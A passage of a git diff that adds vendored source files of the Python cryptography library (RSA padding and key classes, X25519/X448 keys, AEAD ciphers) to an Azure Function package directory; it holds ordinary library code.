b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py new file mode 100644 index 0000000..e3ea0ca --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/padding.py @@ -0,0 +1,101 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing + +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives._asymmetric import ( + AsymmetricPadding as AsymmetricPadding, +) +from cryptography.hazmat.primitives.asymmetric import rsa + + +class PKCS1v15(AsymmetricPadding): + name = "EMSA-PKCS1-v1_5" + + +class _MaxLength: + "Sentinel value for `MAX_LENGTH`." + + +class _Auto: + "Sentinel value for `AUTO`." + + +class _DigestLength: + "Sentinel value for `DIGEST_LENGTH`." 
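The underscore-prefixed classes above are plain sentinel types: they let PSS (defined next) distinguish an explicit integer salt length from the symbolic choices it re-exports as PSS.MAX_LENGTH, PSS.AUTO, and PSS.DIGEST_LENGTH. A hedged sketch of how a caller selects one; the private_key object in the commented line is hypothetical:

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

# Request the largest salt the key/hash combination permits.
pss = padding.PSS(
    mgf=padding.MGF1(hashes.SHA256()),
    salt_length=padding.PSS.MAX_LENGTH,
)
# signature = private_key.sign(b"data", pss, hashes.SHA256())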
+ + +class PSS(AsymmetricPadding): + MAX_LENGTH = _MaxLength() + AUTO = _Auto() + DIGEST_LENGTH = _DigestLength() + name = "EMSA-PSS" + _salt_length: typing.Union[int, _MaxLength, _Auto, _DigestLength] + + def __init__( + self, + mgf: "MGF", + salt_length: typing.Union[int, _MaxLength, _Auto, _DigestLength], + ) -> None: + self._mgf = mgf + + if not isinstance( + salt_length, (int, _MaxLength, _Auto, _DigestLength) + ): + raise TypeError( + "salt_length must be an integer, MAX_LENGTH, " + "DIGEST_LENGTH, or AUTO" + ) + + if isinstance(salt_length, int) and salt_length < 0: + raise ValueError("salt_length must be zero or greater.") + + self._salt_length = salt_length + + +class OAEP(AsymmetricPadding): + name = "EME-OAEP" + + def __init__( + self, + mgf: "MGF", + algorithm: hashes.HashAlgorithm, + label: typing.Optional[bytes], + ): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + self._mgf = mgf + self._algorithm = algorithm + self._label = label + + +class MGF(metaclass=abc.ABCMeta): + _algorithm: hashes.HashAlgorithm + + +class MGF1(MGF): + MAX_LENGTH = _MaxLength() + + def __init__(self, algorithm: hashes.HashAlgorithm): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of hashes.HashAlgorithm.") + + self._algorithm = algorithm + + +def calculate_max_pss_salt_length( + key: typing.Union["rsa.RSAPrivateKey", "rsa.RSAPublicKey"], + hash_algorithm: hashes.HashAlgorithm, +) -> int: + if not isinstance(key, (rsa.RSAPrivateKey, rsa.RSAPublicKey)): + raise TypeError("key must be an RSA public or private key") + # bit length - 1 per RFC 3447 + emlen = (key.key_size + 6) // 8 + salt_length = emlen - hash_algorithm.digest_size - 2 + assert salt_length >= 0 + return salt_length diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py new file mode 100644 index 0000000..9b56e72 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/rsa.py @@ -0,0 +1,425 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import typing +from math import gcd + +from cryptography.hazmat.primitives import _serialization, hashes +from cryptography.hazmat.primitives._asymmetric import AsymmetricPadding +from cryptography.hazmat.primitives.asymmetric import ( + utils as asym_utils, +) + + +class RSAPrivateKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def decrypt(self, ciphertext: bytes, padding: AsymmetricPadding) -> bytes: + """ + Decrypts the provided ciphertext. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the public modulus. + """ + + @abc.abstractmethod + def public_key(self) -> "RSAPublicKey": + """ + The RSAPublicKey associated with this private key. + """ + + @abc.abstractmethod + def sign( + self, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> bytes: + """ + Signs the data. + """ + + @abc.abstractmethod + def private_numbers(self) -> "RSAPrivateNumbers": + """ + Returns an RSAPrivateNumbers. 
+ """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + +RSAPrivateKeyWithSerialization = RSAPrivateKey + + +class RSAPublicKey(metaclass=abc.ABCMeta): + @abc.abstractmethod + def encrypt(self, plaintext: bytes, padding: AsymmetricPadding) -> bytes: + """ + Encrypts the given plaintext. + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The bit length of the public modulus. + """ + + @abc.abstractmethod + def public_numbers(self) -> "RSAPublicNumbers": + """ + Returns an RSAPublicNumbers + """ + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + Returns the key serialized as bytes. + """ + + @abc.abstractmethod + def verify( + self, + signature: bytes, + data: bytes, + padding: AsymmetricPadding, + algorithm: typing.Union[asym_utils.Prehashed, hashes.HashAlgorithm], + ) -> None: + """ + Verifies the signature of the data. + """ + + @abc.abstractmethod + def recover_data_from_signature( + self, + signature: bytes, + padding: AsymmetricPadding, + algorithm: typing.Optional[hashes.HashAlgorithm], + ) -> bytes: + """ + Recovers the original data from the signature. + """ + + +RSAPublicKeyWithSerialization = RSAPublicKey + + +def generate_private_key( + public_exponent: int, + key_size: int, + backend: typing.Any = None, +) -> RSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import backend as ossl + + _verify_rsa_parameters(public_exponent, key_size) + return ossl.generate_rsa_private_key(public_exponent, key_size) + + +def _verify_rsa_parameters(public_exponent: int, key_size: int) -> None: + if public_exponent not in (3, 65537): + raise ValueError( + "public_exponent must be either 3 (for legacy compatibility) or " + "65537. Almost everyone should choose 65537 here!" + ) + + if key_size < 512: + raise ValueError("key_size must be at least 512-bits.") + + +def _check_private_key_components( + p: int, + q: int, + private_exponent: int, + dmp1: int, + dmq1: int, + iqmp: int, + public_exponent: int, + modulus: int, +) -> None: + if modulus < 3: + raise ValueError("modulus must be >= 3.") + + if p >= modulus: + raise ValueError("p must be < modulus.") + + if q >= modulus: + raise ValueError("q must be < modulus.") + + if dmp1 >= modulus: + raise ValueError("dmp1 must be < modulus.") + + if dmq1 >= modulus: + raise ValueError("dmq1 must be < modulus.") + + if iqmp >= modulus: + raise ValueError("iqmp must be < modulus.") + + if private_exponent >= modulus: + raise ValueError("private_exponent must be < modulus.") + + if public_exponent < 3 or public_exponent >= modulus: + raise ValueError("public_exponent must be >= 3 and < modulus.") + + if public_exponent & 1 == 0: + raise ValueError("public_exponent must be odd.") + + if dmp1 & 1 == 0: + raise ValueError("dmp1 must be odd.") + + if dmq1 & 1 == 0: + raise ValueError("dmq1 must be odd.") + + if p * q != modulus: + raise ValueError("p*q must equal modulus.") + + +def _check_public_key_components(e: int, n: int) -> None: + if n < 3: + raise ValueError("n must be >= 3.") + + if e < 3 or e >= n: + raise ValueError("e must be >= 3 and < n.") + + if e & 1 == 0: + raise ValueError("e must be odd.") + + +def _modinv(e: int, m: int) -> int: + """ + Modular Multiplicative Inverse. 
Returns x such that: (x*e) mod m == 1 + """ + x1, x2 = 1, 0 + a, b = e, m + while b > 0: + q, r = divmod(a, b) + xn = x1 - q * x2 + a, b, x1, x2 = b, r, x2, xn + return x1 % m + + +def rsa_crt_iqmp(p: int, q: int) -> int: + """ + Compute the CRT (q ** -1) % p value from RSA primes p and q. + """ + return _modinv(q, p) + + +def rsa_crt_dmp1(private_exponent: int, p: int) -> int: + """ + Compute the CRT private_exponent % (p - 1) value from the RSA + private_exponent (d) and p. + """ + return private_exponent % (p - 1) + + +def rsa_crt_dmq1(private_exponent: int, q: int) -> int: + """ + Compute the CRT private_exponent % (q - 1) value from the RSA + private_exponent (d) and q. + """ + return private_exponent % (q - 1) + + +# Controls the number of iterations rsa_recover_prime_factors will perform +# to obtain the prime factors. Each iteration increments by 2 so the actual +# maximum attempts is half this number. +_MAX_RECOVERY_ATTEMPTS = 1000 + + +def rsa_recover_prime_factors( + n: int, e: int, d: int +) -> typing.Tuple[int, int]: + """ + Compute factors p and q from the private exponent d. We assume that n has + no more than two factors. This function is adapted from code in PyCrypto. + """ + # See 8.2.2(i) in Handbook of Applied Cryptography. + ktot = d * e - 1 + # The quantity d*e-1 is a multiple of phi(n), even, + # and can be represented as t*2^s. + t = ktot + while t % 2 == 0: + t = t // 2 + # Cycle through all multiplicative inverses in Zn. + # The algorithm is non-deterministic, but there is a 50% chance + # any candidate a leads to successful factoring. + # See "Digitalized Signatures and Public Key Functions as Intractable + # as Factorization", M. Rabin, 1979 + spotted = False + a = 2 + while not spotted and a < _MAX_RECOVERY_ATTEMPTS: + k = t + # Cycle through all values a^{t*2^i}=a^k + while k < ktot: + cand = pow(a, k, n) + # Check if a^k is a non-trivial root of unity (mod n) + if cand != 1 and cand != (n - 1) and pow(cand, 2, n) == 1: + # We have found a number such that (cand-1)(cand+1)=0 (mod n). + # Either of the terms divides n. + p = gcd(cand + 1, n) + spotted = True + break + k *= 2 + # This value was not any good... let's try another! + a += 2 + if not spotted: + raise ValueError("Unable to compute factors p and q from exponent d.") + # Found ! + q, r = divmod(n, p) + assert r == 0 + p, q = sorted((p, q), reverse=True) + return (p, q) + + +class RSAPrivateNumbers: + def __init__( + self, + p: int, + q: int, + d: int, + dmp1: int, + dmq1: int, + iqmp: int, + public_numbers: "RSAPublicNumbers", + ): + if ( + not isinstance(p, int) + or not isinstance(q, int) + or not isinstance(d, int) + or not isinstance(dmp1, int) + or not isinstance(dmq1, int) + or not isinstance(iqmp, int) + ): + raise TypeError( + "RSAPrivateNumbers p, q, d, dmp1, dmq1, iqmp arguments must" + " all be an integers." + ) + + if not isinstance(public_numbers, RSAPublicNumbers): + raise TypeError( + "RSAPrivateNumbers public_numbers must be an RSAPublicNumbers" + " instance." 
+ ) + + self._p = p + self._q = q + self._d = d + self._dmp1 = dmp1 + self._dmq1 = dmq1 + self._iqmp = iqmp + self._public_numbers = public_numbers + + @property + def p(self) -> int: + return self._p + + @property + def q(self) -> int: + return self._q + + @property + def d(self) -> int: + return self._d + + @property + def dmp1(self) -> int: + return self._dmp1 + + @property + def dmq1(self) -> int: + return self._dmq1 + + @property + def iqmp(self) -> int: + return self._iqmp + + @property + def public_numbers(self) -> "RSAPublicNumbers": + return self._public_numbers + + def private_key(self, backend: typing.Any = None) -> RSAPrivateKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_rsa_private_numbers(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RSAPrivateNumbers): + return NotImplemented + + return ( + self.p == other.p + and self.q == other.q + and self.d == other.d + and self.dmp1 == other.dmp1 + and self.dmq1 == other.dmq1 + and self.iqmp == other.iqmp + and self.public_numbers == other.public_numbers + ) + + def __hash__(self) -> int: + return hash( + ( + self.p, + self.q, + self.d, + self.dmp1, + self.dmq1, + self.iqmp, + self.public_numbers, + ) + ) + + +class RSAPublicNumbers: + def __init__(self, e: int, n: int): + if not isinstance(e, int) or not isinstance(n, int): + raise TypeError("RSAPublicNumbers arguments must be integers.") + + self._e = e + self._n = n + + @property + def e(self) -> int: + return self._e + + @property + def n(self) -> int: + return self._n + + def public_key(self, backend: typing.Any = None) -> RSAPublicKey: + from cryptography.hazmat.backends.openssl.backend import ( + backend as ossl, + ) + + return ossl.load_rsa_public_numbers(self) + + def __repr__(self) -> str: + return "<RSAPublicNumbers(e={0.e}, n={0.n})>".format(self) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, RSAPublicNumbers): + return NotImplemented + + return self.e == other.e and self.n == other.n + + def __hash__(self) -> int: + return hash((self.e, self.n)) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py new file mode 100644 index 0000000..4848ac1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/types.py @@ -0,0 +1,69 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.hazmat.primitives.asymmetric import ( + dh, + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) + + +# Every asymmetric key type +PUBLIC_KEY_TYPES = typing.Union[ + dh.DHPublicKey, + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, +] +# Every asymmetric key type +PRIVATE_KEY_TYPES = typing.Union[ + dh.DHPrivateKey, + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, + x25519.X25519PrivateKey, + x448.X448PrivateKey, +] +# Just the key types we allow to be used for x509 signing.
This mirrors +# the certificate public key types +CERTIFICATE_PRIVATE_KEY_TYPES = typing.Union[ + ed25519.Ed25519PrivateKey, + ed448.Ed448PrivateKey, + rsa.RSAPrivateKey, + dsa.DSAPrivateKey, + ec.EllipticCurvePrivateKey, +] +# Just the key types we allow to be used for x509 signing. This mirrors +# the certificate private key types +CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES = typing.Union[ + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, +] +# This type removes DHPublicKey. x448/x25519 can be a public key +# but cannot be used in signing so they are allowed here. +CERTIFICATE_PUBLIC_KEY_TYPES = typing.Union[ + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py new file mode 100644 index 0000000..35e356c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/utils.py @@ -0,0 +1,24 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.hazmat.bindings._rust import asn1 +from cryptography.hazmat.primitives import hashes + + +decode_dss_signature = asn1.decode_dss_signature +encode_dss_signature = asn1.encode_dss_signature + + +class Prehashed: + def __init__(self, algorithm: hashes.HashAlgorithm): + if not isinstance(algorithm, hashes.HashAlgorithm): + raise TypeError("Expected instance of HashAlgorithm.") + + self._algorithm = algorithm + self._digest_size = algorithm.digest_size + + @property + def digest_size(self) -> int: + return self._digest_size diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py new file mode 100644 index 0000000..f0bb831 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x25519.py @@ -0,0 +1,81 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class X25519PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "X25519PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x25519_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. 
+ """ + + +class X25519PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "X25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + return backend.x25519_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "X25519PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x25519_supported(): + raise UnsupportedAlgorithm( + "X25519 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x25519_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> X25519PublicKey: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: X25519PublicKey) -> bytes: + """ + Performs a key exchange operation using the provided peer's public key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py new file mode 100644 index 0000000..64260b8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/x448.py @@ -0,0 +1,81 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc + +from cryptography.exceptions import UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import _serialization + + +class X448PublicKey(metaclass=abc.ABCMeta): + @classmethod + def from_public_bytes(cls, data: bytes) -> "X448PublicKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x448_load_public_bytes(data) + + @abc.abstractmethod + def public_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PublicFormat, + ) -> bytes: + """ + The serialized bytes of the public key. 
+ """ + + +class X448PrivateKey(metaclass=abc.ABCMeta): + @classmethod + def generate(cls) -> "X448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + return backend.x448_generate_key() + + @classmethod + def from_private_bytes(cls, data: bytes) -> "X448PrivateKey": + from cryptography.hazmat.backends.openssl.backend import backend + + if not backend.x448_supported(): + raise UnsupportedAlgorithm( + "X448 is not supported by this version of OpenSSL.", + _Reasons.UNSUPPORTED_EXCHANGE_ALGORITHM, + ) + + return backend.x448_load_private_bytes(data) + + @abc.abstractmethod + def public_key(self) -> X448PublicKey: + """ + The serialized bytes of the public key. + """ + + @abc.abstractmethod + def private_bytes( + self, + encoding: _serialization.Encoding, + format: _serialization.PrivateFormat, + encryption_algorithm: _serialization.KeySerializationEncryption, + ) -> bytes: + """ + The serialized bytes of the private key. + """ + + @abc.abstractmethod + def exchange(self, peer_public_key: X448PublicKey) -> bytes: + """ + Performs a key exchange operation using the provided peer's public key. + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py new file mode 100644 index 0000000..4120422 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__init__.py @@ -0,0 +1,27 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
+ + +from cryptography.hazmat.primitives._cipheralgorithm import ( + BlockCipherAlgorithm, + CipherAlgorithm, +) +from cryptography.hazmat.primitives.ciphers.base import ( + AEADCipherContext, + AEADDecryptionContext, + AEADEncryptionContext, + Cipher, + CipherContext, +) + + +__all__ = [ + "Cipher", + "CipherAlgorithm", + "BlockCipherAlgorithm", + "CipherContext", + "AEADCipherContext", + "AEADDecryptionContext", + "AEADEncryptionContext", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b94998d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc new file mode 100644 index 0000000..e94eba2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/aead.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc new file mode 100644 index 0000000..fad689a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/algorithms.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..21fd382 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc new file mode 100644 index 0000000..7ce24fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/__pycache__/modes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py new file mode 100644 index 
0000000..0204ad9 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/ciphers/aead.py @@ -0,0 +1,361 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import os +import typing + +from cryptography import exceptions, utils +from cryptography.hazmat.backends.openssl import aead +from cryptography.hazmat.backends.openssl.backend import backend + + +class ChaCha20Poly1305: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "ChaCha20Poly1305 is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + utils._check_byteslike("key", key) + + if len(key) != 32: + raise ValueError("ChaCha20Poly1305 key must be 32 bytes.") + + self._key = key + + @classmethod + def generate_key(cls) -> bytes: + return os.urandom(32) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + return aead._encrypt(backend, self, nonce, data, [associated_data], 16) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt(backend, self, nonce, data, [associated_data], 16) + + def _check_params( + self, + nonce: bytes, + data: bytes, + associated_data: bytes, + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if len(nonce) != 12: + raise ValueError("Nonce must be 12 bytes") + + +class AESCCM: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes, tag_length: int = 16): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESCCM key must be 128, 192, or 256 bits.") + + self._key = key + if not isinstance(tag_length, int): + raise TypeError("tag_length must be an integer") + + if tag_length not in (4, 6, 8, 10, 12, 14, 16): + raise ValueError("Invalid tag_length") + + self._tag_length = tag_length + + if not backend.aead_cipher_supported(self): + raise exceptions.UnsupportedAlgorithm( + "AESCCM is not supported by this version of OpenSSL", + exceptions._Reasons.UNSUPPORTED_CIPHER, + ) + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. 
Max 2**31 - 1 bytes" + ) + + self._check_params(nonce, data, associated_data) + self._validate_lengths(nonce, len(data)) + return aead._encrypt( + backend, self, nonce, data, [associated_data], self._tag_length + ) + + def decrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + self._check_params(nonce, data, associated_data) + return aead._decrypt( + backend, self, nonce, data, [associated_data], self._tag_length + ) + + def _validate_lengths(self, nonce: bytes, data_len: int) -> None: + # For information about computing this, see + # https://tools.ietf.org/html/rfc3610#section-2.1 + l_val = 15 - len(nonce) + if 2 ** (8 * l_val) < data_len: + raise ValueError("Data too long for nonce") + + def _check_params( + self, nonce: bytes, data: bytes, associated_data: bytes + ) -> None: + utils._check_byteslike("nonce", nonce) + utils._check_bytes("data", data) + utils._check_bytes("associated_data", associated_data) + if not 7 <= len(nonce) <= 13: + raise ValueError("Nonce must be between 7 and 13 bytes") + + +class AESGCM: + _MAX_SIZE = 2**31 - 1 + + def __init__(self, key: bytes): + utils._check_byteslike("key", key) + if len(key) not in (16, 24, 32): + raise ValueError("AESGCM key must be 128, 192, or 256 bits.") + + self._key = key + + @classmethod + def generate_key(cls, bit_length: int) -> bytes: + if not isinstance(bit_length, int): + raise TypeError("bit_length must be an integer") + + if bit_length not in (128, 192, 256): + raise ValueError("bit_length must be 128, 192, or 256") + + return os.urandom(bit_length // 8) + + def encrypt( + self, + nonce: bytes, + data: bytes, + associated_data: typing.Optional[bytes], + ) -> bytes: + if associated_data is None: + associated_data = b"" + + if len(data) > self._MAX_SIZE or len(associated_data) > self._MAX_SIZE: + # This is OverflowError to match what cffi would raise + raise OverflowError( + "Data or associated data too long. 
